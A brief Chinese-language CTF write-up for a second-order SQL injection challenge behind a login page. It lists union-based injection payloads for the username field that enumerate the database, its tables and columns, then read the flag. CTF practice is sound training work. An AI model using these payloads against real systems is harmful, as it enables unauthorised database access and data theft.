题目就是二次注入,打开是一个登录界面,和[[RCTF2015]EasySQL](https://www.silent666.com/index.php/archives/68/)相似
按照那题的思路在username处进行注入
payload username =1' union select database() #
username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #
username =1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
username =1' union select flag from flag #
估计是这段时间最后一次更新write-up